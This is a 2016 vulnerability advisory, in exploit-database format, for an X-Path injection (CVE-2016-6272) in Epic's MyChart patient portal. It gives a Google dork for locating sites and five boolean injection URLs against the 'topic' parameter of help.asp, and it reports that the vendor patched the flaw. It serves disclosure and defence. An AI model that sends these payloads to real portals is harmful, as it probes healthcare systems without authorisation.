31 lines
No EOL
1.6 KiB
Text
31 lines
No EOL
1.6 KiB
Text
# Exploit Title: Epic Systems Corporation MyChart X-Path Injection
|
|
# Google Dork: MyChart® licensed from Epic Systems Corporation
|
|
# Date: 8/19/16
|
|
# Exploit Author: Shayan Sadigh (http://threat.tevora.com/author/shayan/)
|
|
# Vendor Homepage: https://www.epic.com/software
|
|
# Software Link: N/A
|
|
# Version: N/A
|
|
# Tested on: Windows/Unix
|
|
# CVE : CVE-2016-6272
|
|
|
|
Epic Systems Corporation MyChart "is a web portal offered by most Epic healthcare organizations that gives you controlled access to the same Epic medical records your doctors use and provides convenient self-service functions that reduce costs and increase satisfaction."
|
|
|
|
The MyChart software contains an X-Path injection due to the lack of sanitization for the GE parameter "topic". A remote attacker can access contents of an XML document containing static display strings, such as field labels, via the topic parameter to help.asp.
|
|
|
|
EPIC was quick to respond to contact and patch the vulnerability in MyChart.
|
|
|
|
Below are two proof of concepts:
|
|
|
|
Proof of concept 1:
|
|
|
|
https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=7900 AND ("LygB"="LygB ===> TRUE (this will show the help topic for enabling cookies)
|
|
|
|
https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=8000 AND ("LygB"="LygB ===> FALSE (will not show)
|
|
|
|
Proof of concept 2 (operations):
|
|
|
|
https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*8 OR "000OxPf"="000OxPf ===> TRUE
|
|
|
|
https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 OR "000OxPf"="000OxPf ===> TRUE (because of the OR)
|
|
|
|
https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 AND"000OxPf"="000OxPf ===> FALSE |